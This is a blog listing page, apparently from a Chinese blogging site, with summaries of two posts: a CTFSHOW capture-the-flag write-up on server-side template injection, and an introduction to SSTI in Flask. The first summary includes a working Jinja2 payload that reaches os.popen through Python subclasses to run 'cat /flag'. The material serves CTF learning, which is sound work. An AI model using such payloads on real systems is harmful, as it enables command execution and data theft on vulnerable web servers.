2023年8月9日
CTFSHOW-SSTI
摘要: # CTFSHOW-SSTI ## web361 ``` ?name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} ``` ## web362 ``` 阅读全文
posted @ 2023-08-09 10:02 Solitude0c 阅读(399) 评论(0) 推荐(0)
SSTI 服务器端模板注入
摘要: # SSTI 服务器端模板注入 ## flask基础 > 不正确的使用模板引擎进行渲染时,则会造成模板注入 **路由** ``` from flask import flask @app.route('/index/') def hello_word(): return 'hello word' ` 阅读全文
posted @ 2023-08-09 10:02 Solitude0c 阅读(182) 评论(0) 推荐(0)